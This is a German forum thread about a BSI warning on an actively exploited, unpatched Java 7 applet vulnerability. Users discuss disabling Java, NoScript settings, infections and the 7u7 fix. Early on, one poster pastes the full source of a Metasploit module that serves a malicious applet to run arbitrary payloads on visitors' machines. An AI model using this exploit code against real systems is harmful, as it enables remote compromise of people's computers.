BSI warnt vor Java-Schwachstelle

[Annika_Kremer]

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) warnt vor einer kritischen Java-Sicherheitslücke, die von Kriminellen bereits aktiv ausgenutzt wird. Einen Patch für die Lücke gibt es bislang noch nicht, so dass nur der Verzicht auf die Nutzung von Java zuverlässigen Schutz vor einer Infektion mit Schadsoftware bietet.

zur News

[unnex]

hier mal ein metasploit exploit dazu:

Code:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({ :javascript => false })

	def initialize( info = {} )
		super( update_info( info,
			'Name'          => 'Java 7 Applet Remote Code Execution',
			'Description'   => %q{
					This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary
				Java code outside the sandbox. This flaw is also being exploited in the wild, and there is
				no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome
				and	Firefox across different platforms.
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Unknown', # Vulnerability Discovery
					'jduck', # metasploit module
					'sinn3r', # metasploit module
					'juan vazquez', # metasploit module
				],
			'References'    =>
				[
					#[ 'CVE', '' ],
					#[ 'OSVDB', '' ],
					[ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
					[ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
				],
			'Platform'      => [ 'java', 'win', 'linux' ],
			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
			'Targets'       =>
				[
					[ 'Generic (Java Payload)',
						{
							'Arch' => ARCH_JAVA,
						}
					],
					[ 'Windows Universal',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'win'
						}
					],
					[ 'Linux x86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'linux'
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 26 2012'
			))
	end


	def on_request_uri( cli, request )
		if not request.uri.match(/\.jar$/i)
			if not request.uri.match(/\/$/)
				send_redirect(cli, get_resource() + '/', '')
				return
			end

			print_status("#{self.name} handling request")

			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
			return
		end

		paths = [
			[ "Exploit.class" ]
		]

		p = regenerate_payload(cli)

		jar  = p.encoded_jar
		paths.each do |path|
			1.upto(path.length - 1) do |idx|
				full = path[0,idx].join("/") + "/"
				if !(jar.entries.map{|e|e.name}.include?(full))
					jar.add_file(full, '')
				end
			end
			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb")
			data = fd.read(fd.stat.size)
			jar.add_file(path.join("/"), data)
			fd.close
		end

		print_status("Sending Applet.jar")
		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

		handler( cli )
	end

	def generate_html
		html  = "<html><head></head>"
		html += "<body>"
		html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
		html += "</applet></body></html>"
		return html
	end

end

quelle: http://packetstormsecurity.org/files...17_exec.rb.txt

[HouseKatZe]

Einen Patch für die Lücke gibt es bislang noch nicht ...

Das wird bestimmt wieder Ewigkeiten dauern. Wie bei dem Flashback Trojaner.

Entdeckt im September 2011, geschlossen im Februar 2012.

[Holzkohlen]

Meh, ich habs durch den Mozilla Plugin Check heute gesehen und schon deaktiviert.

[Trollolol]

NoScript.

[unnex]

NoScript.

mit noscript hat das nixs zu tuhen. entweder du laesst die javaausfuehrung zu oder nicht.

[Neoromantic89]

Ich hab den Bettel schon seit Monaten deaktiviert.

[Trollolol]

mit noscript hat das nixs zu tuhen. entweder du laesst die javaausfuehrung zu oder nicht.

Ja und genau das kann NoScript. Und der Vorteil ist, dass man nicht gleich das ganze Plugin deaktivieren/deinstallieren muss und somit eben einfacher einzelne vertrauenswürdige Applets zulassen kann.
Nur weil Java eine Schwachstelle hat bedeutet das ja nicht, dass man völlig drauf verzichten muss. Ich bezweifel jedenfalls stark, dass Applets die seit Jahren nicht mehr veraendert wurden die Schwachstelle ausnutzen, oder dass alle halbwegs seriösen Anbieter ihre Applets "nachrüsten".
Die Gefahr kommt ja hauptsächlich von Werbung, und die bleibt gesperrt oder auch durch Adblock ganz weg.

[Nelson87]

Nutzt hier jemand jdownloader und Java 7 ?
Ich nutze noch Java 6-33 weil ich von einigen Problemen zwischen JD und Java 7 gelesen habe. Das kann mitlerweile aber auch behoben sein, bei den ganzen Sicherheitsproblemen wäre ein Update von Java wohl mal nicht verkehrt. Im Browser habe ich Java schon ganz deaktiviert.
Leider läuft JD ja nicht ohne Java sonst könnte ich wohl ganz darauf verzichten.

[Sempralon]

Ein Schweizer Käse hat Löcher?

Is ja mal was ganz neues!

Es amüsiert mich aber dennoch, dass das BSEI davor warnt!
Nicht falsch verstehen, Warnungen sind immer gut!

[MzzM]

Mich hats gerade eben selbst erwischt. Vorhin noch den Artikel gelesen und mir gedacht, "passiert mir sowieso nicht". Nunja Daten sichern und win neu aufsetzen.

Ich empfehle es jedem das so schnell wie möglich zu deaktivieren.

[traceroute]

Wie kann ich denn bei NoScript wieder alle Seiten temporär verbieten, ohne dass meine bereits erlaubten Seiten "verschwinden"? Ich also, nach einem Java-Update dann wieder in den Normalbetrieb gehen kann und alle früher erlaubten Seiten, auch wieder erlaubt sind?

[unnex]

Ja und genau das kann NoScript. Und der Vorteil ist, dass man nicht gleich das ganze Plugin deaktivieren/deinstallieren muss und somit eben einfacher einzelne vertrauenswürdige Applets zulassen kann.
Nur weil Java eine Schwachstelle hat bedeutet das ja nicht, dass man völlig drauf verzichten muss. Ich bezweifel jedenfalls stark, dass Applets die seit Jahren nicht mehr veraendert wurden die Schwachstelle ausnutzen, oder dass alle halbwegs seriösen Anbieter ihre Applets "nachrüsten".
Die Gefahr kommt ja hauptsächlich von Werbung, und die bleibt gesperrt oder auch durch Adblock ganz weg.

aber genau das sollte man lieber machen, naehmlich java komplett zu deaktivieren.
lies doch mal das exploit dann wird dir klar das du entweder java komplett deaktivieren musst oder vor dessen ausfuehrungen das java fragen lassen musst. fuer beides brauch man kein noscript. aber weiso einfach wenns auch komplett umstaendlich geht -.-

fuer solche einstellungen brauchst du keine extra addons wie noscript oder sonstwas o.0

was das angeht betrefflich: "Die Gefahr kommt ja hauptsächlich von Werbung, und die bleibt gesperrt oder auch durch Adblock ganz weg."
sei dir da mal nich so sicher ;-)

[Nwabudike]

Also wenn schon das BSI Schwachstellen in Java findet, geht es gar nicht mehr schlimmer.

[Lobo0202]

Wie kann ich denn bei NoScript wieder alle Seiten temporär verbieten, ohne dass meine bereits erlaubten Seiten "verschwinden"?

was meinst du?

nach der noscript installation ist erstmal alles gesperrt - du musst jede seite einzeln freischalten, entweder temporär oder permanent. unter "revoke temporary permissions" löschst du alle temporären ausnahmen - um einzelne einträge zu löschen, kannst du dir bei den optionen die whitelist anzeigen lassen.

blöd ist es nur, falls du deine standard-websites unter temporary eingeordnet hast ...

die "allow/forbid scripts globally" funktion fummelt nicht an der whitelist herum. betrachte die funktion einfach als "addon de-/aktivieren" (mit wenigen ausnahmen bei besch***en konfigurierten servern)

[iwantneko]

Zu blöd, bin auch gerade am neu aufsetzen.
Naja hatte von den meisten Sachen zum Glück Sicherheitskopien. Werde dann wohl auch nur noch java script auf vertrauenswürdigen Seiten aktivieren.

[traceroute]

Gibt's einen Test, mit dem ich überprüfen kann, ob ich infiziert bin?

Und zu NoScript: Ich suche eigtl. nur das Pendant zu "Skripte allgemein erlauben (nicht empfohlen)". Ich will nicht meine gesamte Whitelist löschen müssen. Also nur ein Möglichkeit alle Seiten temporär zu verbieten.

[Nelson87]

Auf java.com gibt es jetzt die Version 7 Update 7, scheinbar hat man jetzt reagiert.

[markantelli]

Leider läuft JD ja nicht ohne Java sonst könnte ich wohl ganz darauf verzichten.

Beim Ausführen von JD werden doch gar keine fremden Java-Dateien ausgeführt. Wozu solltest du dann auf Java verzichten wollen?
Wenn du den Entwicklern eines Programms nicht vertraust, solltest du das Programm gar nicht benutzen. Unabhängig davon, ob es unter Java läuft oder aber in einer anderen Sprache programmiert wurde.

Hauptsächlich geht es hier um Java-Applets, die über das Java-Plugin ausgeführt werden.

Wie kann ich denn bei NoScript wieder alle Seiten temporär verbieten, ohne dass meine bereits erlaubten Seiten "verschwinden"?

Wieso wieder temporär verbieten? In der Standardeinstellung wird doch alles verboten, was nicht ausdrücklich per Whitelist erlaubt wird?

aber genau das sollte man lieber machen, naehmlich java komplett zu deaktivieren.

Ja und? Wenn schon müsste das Java-Plugin deaktiviert werden. Muss man aber nicht, da man mit Noscript die Ausführung von Java-Applets unterbinden kann - wahlweise aber auch relativ einfach zulassen kann.
Das dürfte für die meisten User, speziell die, die Noscript bereits benutzen, wesentlich praktikabler sein.

[akumu00]

das 7u7 update ist raus welches diese Sicherheitslücke schließt.
Aber schon peinlich, Oracle ist diese schwere Lücke schon seit APRIL bekannt.